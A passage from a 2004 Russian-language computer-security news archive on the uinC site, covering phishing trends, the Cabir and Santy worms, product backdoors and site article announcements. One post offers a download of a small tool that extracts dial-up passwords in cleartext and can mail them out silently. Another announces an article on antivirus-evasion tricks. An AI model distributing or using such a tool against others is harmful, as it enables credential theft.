uinC: Новости компьютерной безопасности

Архив новостей за 2004 год

Приветствуем!

Новости Нашего Сайта

26/10/2004 21:35 Новая статья: Обзор программ для исследования содержимого жесткого диска
Рано или поздно пользователь персонального компьютера сталкивается с проблемой конфиденциальности данных, хранимых на жестком диске.
Данная статья написана для тех, кто хочет понять принципы и методику проведения экспертизы содержимого жесткого диска. Основная цель статьи - ликвидация непонимания и ошибок в области защиты информации и обеспечения ее безопасного хранения.
В статье подробно рассмотрено большое количество различных приложений, призванных автоматизировать процесс исследования и анализа содержимого жесткого диска, таких как: Secure Hash Signature Generator, DiskSigPro, Accessdata Forensic Toolkit, FTK Imager, HashKeeper, Encase, Autopsy Forensic Browser, ProDiscover, Ilook Investigator, Ontrack Factracker, Maresware Forensic Suite, Paraben E-mail Examiner, Network E-mail Examiner, NetAnalysis, Metadata Assistant и другие.
Ознакомиться: http://www.uinc.ru/articles/zametki/009.shtml

1/09/2004 00:12 Внимание! Появились новые разделы на сайте!
Мы рады сообщить всем нашим посетителям о новых возможностях, которые с сегодняшнего дня будет предоставлять наш сайт.
Во-первых, это система трансляции наших новостей в RSS формате, для этого были открыты две ленты новостей "uinС: Новости компьютерной безопасности" и "uinС: Программа дня". В каждой из новостных лент представлено по 25 новостей из разделов "Главные новости" и "Программа дня", которые обновляются в реальном времени, более подробную информацию о системе RSS и ее возможностях вы можете узнать на странице RSS системы.
Во-вторых, заработал софт-архив основанный на разделе новостей "Программа дня", этот архив является первым архивом бесплатных тематических программ в Интернете на русском языке.
Мы ждем Ваших комментариев, замечаний и предложений относительно новых возможностей нашего сайта и надеемся на вашу помощь в поддержке на данный момент уникального софт-архива.

22/06/2004 23:46 Новая статья: Эвристический анализ
Командой UINC ведется работа над статьей посвященной эвристическому анализу файлов самого различного типа (исполняемые файлы, документы ms office, vbs, batch файлы и т.д.), на наличие в них вредоносных компонентов. К сотрудничеству (соавторству) приглашаются лица, обладающие знаниями на эту тему.
По любым вопросам просьба писать на: beautyonthefire[at]mail.ru

17/04/2004 20:25 Новая статья: Уязвимости эмуляторов кода
Генераторы полиморфных шифровщиков/расшифровщиков очень часто используются для защиты исполняемых файлов (полностью либо частично) и во многих компьютерных вирусах. Для того, что бы усложнить процесс создания утилит, предназначенных для автоматического снятия защит такого рода, и обнаружения вирусов, используются различные алгоритмы, называемые анти-эмуляционными трюками. В статье приводятся примеры таких алгоритмов и результаты их тестирования на наиболее популярных антивирусных программах, таких как Panda AntiVirus Titanium 2004, Norton Antivirus 2004, Stop! Scanner 5.0, Dr. Web 4.30a, Kaspersky Anti-virus (AVP) v3.5.133.0.
Ознакомиться: http://www.uinc.ru/articles/48/

22/03/2004 16:06 На сайте новая статья: Эмуляция программного кода.
Документ содержит теоретическую и практическую информацию, посвященную основам разработки эмуляторов программного кода и их использованию в антивирусных программах.
Ознакомиться: http://www.uinc.ru/articles/47/

16/03/2004 19:02 На сайте новая статья: Прямой доступ к макросам в документах MS WORD.
Рассматриваются недокументированные подробности внутреннего строения документов MS Word, позволяющие обеспечить прямой программный доступ к исходному тексту хранящихся внутри макросов.
Ознакомиться: http://www.uinc.ru/articles/46/

5/03/2004 16:27 На сайте новая статья: Анализаторы кода в антивирусах.
Данная статья посвящена основам технологии Анализа кода. Она является неотъемлемой составляющей эмулятора программного кода и используется во всех профессионально разработанных антивирусных программах. В качестве примера, рассматриваются исполняемые файлы формата Portable Executable.
Ознакомиться: http://www.uinc.ru/articles/45/index.shtml

4/03/2004 01:11 Обновление статьи: Внутренний формат документов MS WORD.
В статье рассматриваются малоизвестные подробности внутреннего строения файлов MS Office: низкоуровневая организация структурированных хранилищ (structured storages), методы доступа к их содержимому. Также приводится краткое описание общей структуры документов MS WinWord различных версий. Приведенная информация может быть использована для самостоятельной генерации WinWord-документов, для восстановления информации из поврежденных DOC-файлов, для написания собственных антивирусов и т.п.
Обновления: уточнено содержание заголовка структурированного хранилища, что позволяет получать доступ к большим и сверхбольшим (более 7 Мб) DOC-файлам.
Ознакомиться: http://www.uinc.ru/articles/39/index.shtml

2/03/2004 20:17 На сайте новая программа: Advanced Dialup Password Recovery 1.1
Программа Advanced Dialup Password Recovery предназначена для получения паролей на соединения по RAS в открытом виде.

Из особеностей/отличий:

Умеет отправлять пароли почтой
Сохраняет в файл
Копирует в буфер обмена
Работает из GUI и из командной строки (если запущена с одним из известных ей параметров, то главное окно не покажется)
Размер ~6 Kb

Скачать здесь: http://www.uinc.ru/scripts/load.cgi?files/other/adpr.zip

6/02/2004 02:38 Возобновлена рассылка новостей!
Просим прощения за отсутствие рассылок после Нового Года. На то есть свои причины, надеемся на ваше понимание.
Чтобы хоть как-то компенсировать упущенное, предлагаем вам улучшенный вариант архива новостей. Что там есть:
+ Последние несколько рассылок в виде отдельных текстовых файлов
+ Заархивированные выпуски рассылок, по 20 штук в каждом архиве
+ Все новости за 2001ый, 2002ой и 2003ий года в отдельных HTML файлах
Архив: http://www.uinc.ru/news/archive/

Новости из Security Мира

31/12/2004 00:00 С НОВЫМ, 2005-М, ГОДОМ!
Команда UINC поздравляет всех посетителей нашего сайта с Новым Годом! Желаем всем нашим коллегам и единомышленникам счастья в наступающем году и дальнейшего повышения профессионального мастерства! Со своей же стороны мы постараемся приложить максимум сил и возможностей, чтобы в наступающем году наш сайт стал ещё лучше и качественнее. Удачи вам всем!

30/12/2004 13:14 Рейтинг лучших RSS читалок
На сайте Нонеймыча опубликован обзор RSS-читалок, подготовленный господином Дмитрием. Думается, любителем RSS-лент будет интересно почитать его, хотя, как пишет сам автор, обзор является его IMHO ("ОЧЕНЬ СУБЪЕКТИВНЫЙ"). В результате возникшей дискуссии (вернее, сообщений, полученных по E-mail), автор вынужден был опубликовать необходимые пояснения по рейтингу.
Страница с рейтингом
Пояснения автора рейтинга

30/12/2004 12:57 2004 год - год сетевого криминала
Уходящий год был особенно плодороден на угрозы персональным компьютерам. Количество известных на сегодня вирусов перевалило за 100 тысяч, а объем новоиспеченных "червей" в 2004 году превысил 50%. Изощренные попытки заставить людей раскрыть конфиденциальную информацию увеличилось на рекордные 30%. В 2004 году куда меньше стало подростков, пытающихся прославиться, написав какой-нибудь особенно вредный вирус. Так считает Кевин Хоган, главный менеджер компании Symantec. По мнению Хогана, основной акцент в уходящем году был сделан на использование нелегальных компьютерных программ в преступных целях. К мнению Хогана присоединяется и Грэм Клюли, главный консультант компании Sophos, разрабатывающей антивирусные программы. "Когда в дело подключается коммерция, ситуация становится действительно неприятной. Авторы вирусов и хакеры будут пытаться теперь заработать значительные суммы", - говори Клюли. Обзор уяходящего года от BBC (на основании информации, предоставленной Sophos) можно посмотреть, посетив приведённую ниже ссылку.
Итоги уходящего года от BBC

30/12/2004 12:34 Фишинг - наиболее быстрорастущий вид компьютерной преступности
Почти все онлайновые банковские системы освоены мошенниками-фишерами, утверждают специалисты по информационной безопасности компании MessageLabs. В течение 11 месяцев текущего года эксперты MessageLabs обнаружили в Интернете более 18 млн. писем, отправленных фишерами. Из всего потока электронной почты 73% писем были спамом (год назад - 40%), а каждое 16-е содержало вирус. В своем годовом отчете аналитики MessageLabs назвали фишинг наиболее быстрорастущим видом компьютерной преступности. В сентябре 2003 г. эксперты компании отловили всего лишь 273 письма, направляющих пользователя на фальшивые веб-сайты, стилизованные под интернет-банки. К сентябрю 2004 г. поток отловленных писем фишеров составил уже более 2 млн в месяц. Фишеры используют все более сложные технологии для сбора банковских реквизитов. Ранее атаки фишеров, в основном, состояли в перенаправлении ничего не подозревающего пользователя на подставной банковский сайт; теперь информация о банковских реквизитах крадется при открытии электронного сообщения. Пользователю достаточно лишь открыть письмо на отвлеченную тему или вложение письма, использующие уязвимость в почтовых клиентах Microsoft. "Фишинг" может обойтись пользователям Сети в 500 миллионов долларов. Такой подсчет сделал Ponemon Institute (http://www.ponemon.org/), занимающийся вопросами privacy и гражданских свобод. В рамках исследования было опрошено 1335 американских интернет-пользователей. В результате опроса обнаружилось, что 76% респондентов знакомы с электронными письмами-обманками. 70% из этого числа заходили на сайт-обманку, ссылка на который располагалась в подложном письме, 15% оставляли на этом сайте свои персональные данные, а 2% признались в том, что понесли конкретные финансовые потери в результате фишинга. В апреле Gartner проводило аналогичное исследование. Согласно ему, 57 милионов американцев получали письмо от фишеров. Из них 1,8 миллиона человек (3%) оставили личную информацию о себе. Финансовые потери от этой деятельности составили 1,2 миллиона долларов, сообщает InformationWeek.
Crime-Research.ru

30/12/2004 12:22 Взломан сайт проекта Beep Media Player
Вереницу взломов последних дней (от сайта SCO до массовой атаки на phpBB2, из-за чего, в частности, пострадал "Линукс Центр" (www.linuxcenter.ru) и BSDMagazine.ru), продолжил официальный сайт проекта BMP (Beep Media Player — мультимедийного проигрывателя для UNIX/Linux-систем). Взломщик просто разметил оскорбительное сообщение в новостях на главной странице, пояснив, что сайт взломан, поблагодарив всех и пожелав спокойной ночи.
Nixp.Ru

30/12/2004 12:18 NNTP для NetBSD закрывается
Киммо Суоминен (Kimmo Suominen) сообщил, что доступ к почтовым рассылкам NetBSD по NNTP после 10 лет работы будет прекращен. Связано это с тем, что просто больше нет возможности выделять дополнительные ресурсы при условии, что есть и другие хорошие публичные сервисы (в пример приводится gmane.org). Ожидается, что news.gw.com уйдет в offline в конце 31 декабря 2004 года.
Nixp.Ru

30/12/2004 12:16 Опубликован исходный код троянца для смартфонов, ожидается появление новых видов атак
Как утвержается на сайте TechWeb News, исходный код троянца Cabir, предназначенного для заражения смартфонов, опубликован на одном из хакерских сайтов. Это может позволить вирусописателям создать более опасные клоны этого троянца. Об этом говорит также появление более опасных разновидностей троянца - H и I. Как и первая версия Cabir, новые версии червя распространяются по мобильникам в виде специального файла, который распознается системой как утилита управления безопасностью. После того, как инфицированный файл был запущен, на экране появляется слово «Caribe» и червь модифицирует ОС для автозапуска себя при каждом включении телефона. Инфицированный телефон ищет другие уязвимые телефоны через Bluetooth-соединение, и после успешного поиска пересылает на них файл velasco.sis, содержащий червя. Хотя вирус и не уничтожает данные, хранящиеся в телефоне, он блокирует санкционированные bluetooth-соединения и потребляет большой ресурс аккумулятора из-за постоянно включенного Bluetooth-соединения. Обе новые версии вируса изменены таким образом, чтобы быстрее распространяться на новые устройства. Например, они могут находить телефон даже при его уходе из зоны досягаемости. В условиях постоянных телефонных коммуникаций вирус может распространяться очень быстро, сообщает представитель компании. Алексей Гостев, старший вирусный аналитик "Лаборатории Касперского" обвиняет в создании и распространении исходного кода трояна известную хакерскую группу из России "29А". Впрочем, "любовь" "Лаборатории" к этой группе известна давно. Тем не менее, согласно сообщениям другой антивирусной компании - Sophos из Великобритании, в распространении исходного кода виновата одна из бразильских хакерских команд, которая переделала исходный код троянца и опубликовала исходный код уже переработанной (и более опасной) версии Cabir.
TechWeb News

30/12/2004 11:14 В Бауманке создают программу для мобильного ТВ
Смотреть телеканалы на экране мобильного телефона можно будет в Москве и других крупных городах России уже в будущем году. Об этом в эфире «Эха Москвы» заявил гендиректор Российской телерадиовещательной сети Геннадий Скляр. Он уточнил, что речь идет о разработке молодых программистов из МВТУ имени Баумана. Они уже подали заявку на патент. По словам Скляра, «такого нет нигде в мире». Новые частоты для просмотра телеканалов не понадобятся, услугу можно будет оформить у любого сотового оператора с подключенным GPRS. По словам Скляра, специальную программу можно будет установить на телефон, независимо от модели. Главное — поддержка мобильного интернета через GPRS.
"Вебпланета"

30/12/2004 10:36 Apple готовит компьютер за 499 долларов?
По Сети начали гулять хорошо проверенные слухи о том, что компания Apple Computer решила обратить внимание на малообеспеченные слои американского народа. На ближайшей выставке MacWorld Expo компания представит компьютер за 499 долларов. Без монитора. Точной информации о планах Стива Джобса пока нет ни у кого, но журнал The Register, ссылающийся на сайт ThinkSecret.com, утверждает, что машина, выполненная в уже полузабытом форм-факторе slim-case (или, как ее называют там, у них, pizza box) высотой всего 44 миллиметра, а внутри пытливый глаз счастливого владельца сможет обнаружить процессор G4, работающий на частоте 1,25 гигагерц. Кроме того, в недрах машины с кодовым названием Q88, можно будет найти 256 мегабайт памяти, порты USB 2.0 и FireWire 400, Ethernet-карту на 10/100 мегабит в секунду, модем на 56 килобит и, что удивительно для такой дешевой системы, адаптер беспроводного доступа стандарта 802.11b/g. Машина, по всей видимости, будет продаваться под хорошо раскрученным брендом iMac и будет рассчитана, главным образом, на владельцев "полноразмерных" "маков" и Windows-системы, которым нужен компьютер для спальной комнаты.
Internet.Ru

30/12/2004 10:22 Novell представила первую публичную бета-версию Open Enterprise Server
Как сообщает Eweek, компания Novell представила первую публичную бета-версию Novell Open Enterprise Server. OES представляет собой двойную операционную систему. Она может работать на базе SuSE Linux Enterprise Server 9.0, NetWare 7.0 или на обоих. В настоящее время OES доступна только для архитектуры x86. Пользователю потребуется процессор с частотой не менее 700 МГц, 512 МБ RAM. OES появится в продаже в феврале 2005 года. Цена пока не называаетя.
CNews

30/12/2004 10:03 Студент из США осужден за нелегальное распространение софта
Студент из Университета Айовы (США) стал первым правонарушителем, привлеченным к уголовной ответственности в рамках правительственной программы Operation Fastlink, сообщает News Factor. Программа проводится Федеральным бюро расследований США с апреля текущего года и направлена на выявление и арест пиратов, нелегально распространяющих компьютерные игры, фильмы и программное обеспечение. Двадцатишестилетний Джатан Дезир создал две онлайновые библиотеки с пиратскими программами и распространял нелегальную продукцию в интернете. Из-за действий пирата софтверная индустрия понесла убытки в размере около 200000 долларов США. Дезир признал себя виновным в нанесении ущерба и нарушении копирайта. Ему грозит тюремное заключение сроком до пятнадцати лет. Обвинительное заключение будет вынесено судом в марте 2005 года. Программа Operation Fastlink распространяется, помимо США, еще на несколько стран мира. Первые рейды проводились в США, Европе и Азии. ФБР расследует деятельность как крупных компаний, так и частных фирм. Поддержку федералам оказывают несколько агентств и организаций, включая британскую национальную организацию по борьбе с преступлениями в сфере высоких технологий National Hi-Tech Crime Unit и международную организацию Business Software Alliance, которая осуществляет контроль за соблюдением лицензий и авторских прав.
Подробности

30/12/2004 09:45 Троян Trojan-Spy.HTML.Fraud.gen
"Лаборатория Касперского" сообщает о появлении трояна, которому антивирусной компанией было дано имя Trojan-Spy.HTML.Fraud.gen. Также известен как: Phish-BankFraud.eml (McAfee), Trojan Horse (Symantec), TrojanSpy:HTML/UrlSpoof.E* (RAV), HTML_SWENFRAUD.A (Trend Micro), TR/URLSpoof.P (H+BEDV), HTML/URLspoof.B@expl (FRISK), VBS.Trojan.Inor.Z.Spoofer (SOFTWIN), HTML.Phishing.Bank-31 (ClamAV), Exploit/URLSpoof (Panda). Представляет собой программу-шпион из семейства троянских программ, использующих спуфинг-технологию. «Троянцы» реализованы в виде поддельных HTML-страниц. Рассылаются по электронной почте под видом важного сообщения от крупных коммерческих банков, интернет-магазинов, софтверных компаний и т.д. В письме содержится ссылка, в которой использована Frame Spoof уязвимость в Internet Explorer. Уязвимость Frame Spoof (MS04-004) присутствует в 5.x и 6.x версиях Microsoft Interner Explorer. Компанией Microsoft был опубликован специальный документ, в котором приведено описание данной уязвимости и даны рекомендации по распознаванию подобных ложных ссылок. Попадая на сайт, пользователи вводят свои учетные данные, после чего они пересылаются злоумышленникам, и те могут получить полный доступ к управлению конфиденциальной информацией пользователя.
"Лаборатория Касперского"

30/12/2004 09:11 Спамера из Нидерландов оштрафовали за четыре письма
Власти Нидерландов впервые наложили штрафные санкции на спамеров, сообщает Associated Press. По решению независимого надзорного органа в области почты и телекоммуникаций Opta, штрафы будут применены к одному физическому лицу и двум компаниям. Власти обвинили их в рассылке рекламных электронных писем и SMS. По словам представителей Opta, они подписали соглашение с частной французской контрольной компанией CNIL. Таким образом французские и голландские эксперты рассчитывают повысить эффективность борьбы со спамерами. Самому крупному штрафу (45 тысяч евро) подвергся человек, отправивший четыре спам-письма. Одно из посланий содержало рекламные материалы о книге Гитлера Mein Kampf. Спамер отправил его от имени одного из голландских борцов со спамом. Этот же человек отправлял послания с материалами о программном обеспечении, разработанном компанией Groenendaal Uitgeverij BV. В связи с этим компания была оштрафована на 25 тысяч евро. Штрафу в 20 тысяч евро подверглась компания Yellow Monday Institute, рассылавшая пользователям SMS, за которые они платили по 1,10 евро.
Lenta.Ru

29/12/2004 19:26 Бэкдоры в продуктах eEye (IRIS и SecureIIS)
Как сообщает Ланс Кусто (Lance Custo), во время проверки программ, проводимой совместно со своей группой, в IRIS и SecureIIS были обнаружены очень хорошо спрятанные "черные ходы". Бэкдор в IRIS активируется специальным образом сформированным UDP-пакетом, в SecureIIS - HTTP-заголовком (примеры по ссылке). Бэкдоры отсутствуют в IRIS версии до 3.0 и SecureIIS 1.x. В случае, если у Вас осталось желание пользоваться этими программами, рекомендуется откатиться до использования более младших версий программ.
Источник

29/12/2004 14:36 Microsoft обиделась на китайских хакеров
Вчера представители компании Microsoft осудили действия китайской Xfocus Team, которая занимается исследованиями различных уязвимостей и обнародовала на днях примеры кода, который использует новые "дыры" в Microsoft Windows. По мнению представителей Microsoft, такие "безответственные" действия не в интересах потребителей. Реакция компании последовала спустя пять дней после публикации информации о новых уязвимостях. Сейчас в MS изучают уязвимости, обнаруженные ранее. Одна из них связана с функцией для загрузки изображений в формате .bmp, курсоров и иконок. Она может быть использована злоумышленниками при помощи браузеров и почтовых клиентов. Вторая уязвимость, которая была обнаружена в модуле winhlp32.exe, позволяет злоумышленникам использовать в своих целях специально подготовленные файлы-справки, а третья – файлы с анимированными курсорами (.ani). Компьютерам с установленным Service Pack 2 угрожают только файлы справки, специально подготовленные злоумышленниками. Наличие остальных двух "дыр" подтверждается для более ранних версий операционной системы: Windows NT, Windows 2000 и Windows XP (с Service Pack 1). "В Microsoft разочарованы тем, что Xfocus предприняла действия, которые поставили пользователей под угрозу, вместо того чтобы последовать общепринятой традиции сообщить производителям об уязвимостях в частном порядке", – заявила представитель компании. Microsoft не известно об активных атаках злоумышленников, которые бы использовали указанные уязвимости. Видно, господа из службы информации Microsoft не читают сообщения о вирусной активности - например, сообщение Panda Software о появлении трояна Exploit/HHelp, HHelp.
Securitylab.Ru

29/12/2004 14:13 Cabir становится по-настоящему опасным
Антивирусная компания F-Secure, первой обнаружившая вирусы Cabir.H, Cabir.I и Cabir.J, утверждает, что изначально безвредная "концептуальная" разработка приобретает черты все более опасного "боевого" вируса. В новых вариантах Cabir'a устранена ошибка, существенно тормозившая распространение более ранних версий. Если оригинальный вариант вируса мог заражать не более одного телефона из расчета на одну перезагрузку носителя, то версии Cabir.H и Cabir.I поражают все устройства, до которых могут дотянуться (напомним, что размножение идет посредством протокола беспроводной связи Bluetooth). По мнению экспертов, столь стремительный рост числа новых штаммов вируса, а также значительное сходство их "ДНК" говорит о том, что исходники "концептуального" вируса, скорее всего, попали в широкие народные массы. Так что, уважаемые владельцы смартфонов на платформе Symbian, готовьтесь.
Internet.Ru

29/12/2004 14:09 Открытая биллинговая система для домашних сетей
К Новому Году вышел релиз-кандидат открытой системы для учета и контроля трафика в домашних и офbсных сетях Stargazer, сообщает linux.org.ru. Система позволяет производить авторизацию пользователя, вести подсчет трафика по 10 заданным классам трафика. Ведется детальная статистика по каждому посещенному IP-адресу. Гибкая настройка тарифных планов. Есть возможность создания администраторов с разными привилегиями.
Cайт проекта

29/12/2004 13:49 Проект WiFi.CNews.ru
Довольно любопытныя проект открыт в рамках проекта CNEWS. На сайте WiFi.CNews.ru публикуется каталог публичных точек беспроводного доступа в России и СНГ. На настоящий момент в базе имеется 24з хот-спота. Из стран СПГ упоминаются: Киев, Баку, Кишинёв, Алматы, Одесса. Особенно радует наличие в списке населённого пункта с названием "деревня Ангелово", что впрочем, объясняется тем, что в ней расположен санаторий "Росинка" (это Красногорский район Подмосковья).
Сайт проекта

29/12/2004 13:32 Лукашенко усиливает инквизицию в интернете
В Белоруссии для контроля глобальной Сети на местном уровне сложилась (или специально создана) весьма выгодная ситуация: весь интернет-трафик контролируется единственным провайдером-монополистом - «Белтелекомом», в то же время, появление любых материалов нежелательного для властей содержани, вызывает не только закрытие ресурса, но и привлечение, вплоть до уголовной ответственности, как авторов, так и тех, кто эти материалы разместил. На государственном уровне рассматриваются законопроекты, регламентирующие распространение массовой информации в интернете, а журнал Parade объявил Лукашенко одним из главных 10 врагов интернета, наряду с Ким Чен Иром и Саддамом Хусейном. Статья Артёма Борового на сайте CNEWS описывает видениее автора статьи на проблемы с Интернетом в Белоруссии.
Cтатья

29/12/2004 12:51 В Москве прошла конференция по проблеме электронных СМИ и киберпреступности
24 декабря Федеральное агентство по печати и массовым коммуникациям совместно с ГУП города Москвы "Центр информационно-аналитических технологий" провели в Москве конференцию по проблеме присоединения к европейской конвенции по киберпреступности "Защита общества от противоправного использования электронных СМИ, наносящего ущерб государству, обществу и личности". По итогам конференции был принят проект рекомендаций, направленных на защиту от противоправного использования электронных СМИ. Участники конференции предлагают, в частности, осуществить "инвентаризацию" вероятных рисков, возникающих в связи с киберпреступностью, разработать методики организации противодействия киберпреступности, разработать меры по предотвращению компьютерных террористических атак в связи с несовершенством и изношенностью оборудования, определить перечень "критических инфраструктур" и разработать предложения по обеспечению их защиты от киберпреступности и др. В конференции приняли участие представители Министерства промышленности и науки РФ, МВД РФ, Федерального агентства по печати и массовым коммуникациям, аппарата Совета безопасности РФ, ФСБ РФ, правительства Москвы, Академии Генштаба МО, административных округов Москвы, Международного института корпоративной безопасности, ОАО "Электронная Москва", группы компаний "РНТ", корпорации IBM.
Подробности

29/12/2004 12:24 Santy спровоцировал эпидемию форумных вирусов, распространяющихся через поисковики
Идею распространения через поисковые системы, популяризованную на прошлой неделе вирусом Santy, подхватили другие вирусописатели. Как сообщает CNET News, специалисты по вирусной защите фиксируют появление новых модификаций Santy, которые ищут уязвимые сайты с помощью Google и других поисковых систем. Как сообщалось, червь Santy поражал сайты, на которых установлен популярный механизм для создания форумов phpBB. Недавно в phpBB была найдена критичная уязвимость, которая позволяла авторам вирусов атаковать сайт с работающим форумом и получать над ним контроль. Производители phpBB выпустили "заплатку", устраняющую уязвимость и сообщили об этом в СМИ, однако многие хозяева сайтов оставили сообщения без внимания. В результате, когда появился вирус и стал искать сайты-жертвы через Google, многие форумы, в том числе довольно популярные, оказались уничтожены. Администрация Google блокировала действия вируса, и его распространение прекратилось. Однако теперь появляются новые вирусы с аналогичным механизмом, и они пытаются использовать не только Google, но и другие поисковики. В компаниях AOL и Yahoo заявляют, что изучают проблему и по итогам примут адекватные меры.
Lenta.Ru

29/12/2004 12:13 Системного администратора осудили за незаконное устранение неполадок в работе 1С
На 1 год и 6 месяцев условно осудили инженера АСУ сети аптек г.Омска за установку программы Sable (широко известной в узких кругах) с целью исправления неполадок в работе законно купленной программы 1С. Кроме того, администратор выплатит штраф 5000 р. государству и 217 500 (двести семнадцать тысяч пятьсот) рублей в пользу ЗАО "I С". Несмотря на то, что приговор был оглашен давно, 19 июля 2004 г, мы посчитали, что читателям будет полезно ознакомиться с этой неприятной для сисадминов историей.
Приговор суда: www.appp.ru

28/12/2004 17:32 GPS(США) и ГЛОНАСС(Россия): какова допустимая точность позиционирования для гражданских?
Примерно через год будет снят ряд существующих ограничений по получению навигационной спутниковой информации для гражданских пользователей. Об этом заявил руководитель проектного отдела НПО имени Решетнева, где производятся спутники системы "ГЛОНАСС", Виктор Косенко. "Сейчас готовится постановление правительства, где существующие ограничения предполагается скорректировать", - сказал он. По словам Косенко, на сегодняшний день в России существует закон, по которому данные навигационных определений четче 30 метров для гражданских пользователей являются закрытыми. Сейчас совместно с Минобороны РФ обсуждается возможность снятия этих ограничений. Переговоры по степени точности получаемых данных с американской навигационной системы GPS и российской системы "ГЛОНАСС" близятся к завершению. В начале декабря Россия и США уже подписали совместное заявление, в котором говорится о намерении сторон сотрудничать в области навигационных спутниковых систем GPS и "ГЛОНАСС". Обе стороны подтвердили, что намерены предоставлять гражданскую часть сигнала американской системы GPS и российской "ГЛОНАСС" для использования в коммерческих, научных и спасательных целях на непрерывной глобальной и бесплатной основе, сообщает РИА "Новости".
РИА "Новости"

28/12/2004 16:44 Троян, использующий уязвимость Internet Explorer
Как и следовало ожидать, появился троян, использующий уязвимость в Intenet Explorer в системе Windows Help. Уязвимоть присутствует, напомним, в IE 6.0 в ОС Windows XP SP2. Название трояну дано в соответствии с уязвимотью - Exploit-HelpZonePass (другие названия - Exploit/HHelp, HHelp). О появлении трояна сообщили специалисты Panda Software. Троян написан на JavaScript и имеет размер 1400 байт.
Описание трояна

28/12/2004 16:32 США вынесет приговор пирату
В Америке начато первое судебное разбирательство в рамках правительственной программы Operation Fastlink, призванной остановить пиратов, распространяющих нелегальные копии программного обеспечения. Как передает The Register, 26-летний Джатан Дезир (Jathan Desir) был обвинен в распространении нелегального ПО на сумму 200 тыс долл. По результатам обыска, который произошел в прошлом году, в квартире Джатана было обнаружено 13 000 наименований софта. Однако господин Дезир отказывается признавать свою вину. Стоит отметить, что, согласно законодательству США, ему грозит заключение сроком до 15 лет. Предполагается, что приговор будет вынесен в марте следующего года.
Вебпланета

28/12/2004 16:05 Китайцы запустили интернет нового поколения
Сеть CERNET2 (China Education and Research Network 2), объединяющая 25 университетов в 20 городах КНР, обладает пропускной способностью 2,5-10 гигабит в секунду и работает по протоколу IPv6. Сообщение о запуске CERNET2 было сделано в субботу 25 декабря – в день десятилетней годовщины открытия первой "академической" сети CERNET, работавшей по уже устаревшему протоколу IPv4. Стоимость сети, построенной с целью сокращения технологического отставания Поднебесной от западных и восточных конкурентов, составила порядка восьмидесяти миллионов долларов. Примерно такая же сумма, как пишет ITworld.com, была выделена пяти ведущим интернет-провайдерам Китая на обновление их инфраструктуры с целью поддержки шестой версии интернет-протокола.
Internet.Ru

28/12/2004 13:18 Вышла бета-версия Opera 8
На минувшей неделе норвежская компания Opera Software выпустила очередную бета-версию своего браузера. Напомним, что текущая стабильная версия Opera имеет номер 7.54, а новый, находившийся на стадии тестирования вариант имел номер 7.6. Однако с течением времени в браузер было добавлено так много новых функций, что разработчики решили, что новой версии вполне можно присвоить номер 8.0. Соответствующая бета-версия "самого быстрого на Земле браузера" и была выпущена накануне наступления в Норвегии рождественских праздников. Описание всех появившихся в браузере нововведений можно найти на сайте Opera. Из самых заметных стоит отметить оптимизацию представления веб-страниц под размер окна - опция Fit to window width позволяет избавиться от горизонтальной полосы прокрутки, а Fit to page width оптимизирует страницу для печати. Упростилась работа с RSS-каналами - теперь для доступа к ним не нужно активировать почтовый клиент, а при работе с сайтами, поддерживающими экспорт в формате RSS в адресной строке появляется кнопочка, позволяющая добавить канал во встроенный агрегатор. Значительно упростилась система меню, а закрытые страницы и заблокированные всплывающие окна теперь складываются в корзину, расположенную слева от вкладок, на которых расположены веб-страницы. Доступ к закладкам и дополнительным панелям поиска теперь можно получить через панель инструментов, выпадающую из адресной строки при создании нового окна. На каждой вкладке появилось по кнопке закрытия. Не менее важным пунктом стало и улучшение поддержки стандартов DHTML и CSS, с которыми у Opera традиционно возникают проблемы. В новой версии Opera поддерживается инструмент XMLHttpRequest и наконец-то стало возможным работать с почтовой службой Gmail. Выпуск окончательной версии Opera 8 намечен на начало 2005 года.
"Компьюлента"

28/12/2004 12:16 Novell испытывает смесь SuSE Linux с NetWare
Novell приступила к широкому тестированию своего программного обеспечения Open Enterprise Server, в котором инструменты из проприетарного ПО NetWare сочетаются с операционной системой open source SuSE Linux. На прошлой неделе Novell опубликовала на своем веб-сайте общедоступную бета-серсию Open Enterprise Server. Окончательный продукт должен быть готов к февралю. Novell работает над комбинированной системой NetWare-Linux с момента приобретения SuSE Linux в ноябре 2003 года. Будущий продукт служит ядром стратегии компании, направленной на сочетание двух моделей разработки ПО — проприетарной и open source. Ввиду сужения круга пользователей NetWare Novell интенсивно занимается освоением Linux — которая пользуется более широкой поддержкой, чем NetWare, — чтобы представить заказчикам долгосрочный план развития продуктов, в том числе настольного ПО и инструментов разработки. Novell Open Enterprise Server позволит существующим заказчикам Novell эксплуатировать смешанную сеть из серверов NetWare и SuSE Linux и использовать общие инструменты управления. В один из компонентов системы, называемый Novell Nterprise Linux Services 1.0, Novell включила переписанные для SuSE Linux традиционные функции NetWare, такие как управление файлам и принтерами. В пакет входит ядро операционной системы NetWare и SuSE Linux Server 9 Enterprise Edition, основанный на ядре Linux 2.6. Кроме того, в него входит так называемое ПО высокой готовности, предотвращающее отказы сервера, а также рабочие инструменты для конечных пользователей iFolder и Virtual Office.
ZDNet

28/12/2004 11:32 Google-червь атакует AOL и Yahoo
Не успела Google побороть одного червя Santy, как начали распространяться его варианты, использующие не только эту, но и другие поисковые машины. Проблема Santy возникла неделю назад, когда веб-сайты электронных досок объявлений обнаружили, что их страницы стерты и заполнены текстом самого червя. Распространяется он, разыскивая при помощи Google веб-страницы, использующие уязвимые версии программного обеспечения PHP Bulletin Board (phpBB). Когда Google принял меры к тому, чтобы помешать червю искать дырявое ПО электронных досок объявлений через свою поисковую систему, начали появляться варианты Santy, использующие, кроме Google, поисковые машины AOL и Yahoo. «Perl.Santy.B — это червь, написанный в виде скрипта Perl, который пытается распространиться на веб-серверы, исполняющие ПО электронной доски объявлений phpBB 2.x версии 2.0.11 и ниже, предупреждает Symantec в своем бюллетене от 26 декабря. — Для поиска новых потенциальных целей заражения он применяет поисковую машину AOL или Yahoo». AOL, которая пользуется поисковой технологией Google, изучает проблему, но не может с полной определенностью сказать, предотвратит ли уже введенная Google блокировка злоупотребление поисковым сайтом AOL. У Yahoo, которая отказалась от технологии Google еще в феврале, комментарии получить не удалось. Появилось и несколько других вариантов Santy. Santy.c опять атакует Google. Сегодня «Лаборатория Касперского» переименовала Santy.d и Santy.e в Spyki.a и b., отмечая значительные отличия в структуре этих червей по сравнению с более ранними версиями Santy. Секьюрити-фирма уточнила также, что новые черви используют для распространения бразильский вариант Google.
Подробности

28/12/2004 11:06 America Online вынуждает спамеров искать других адресатов
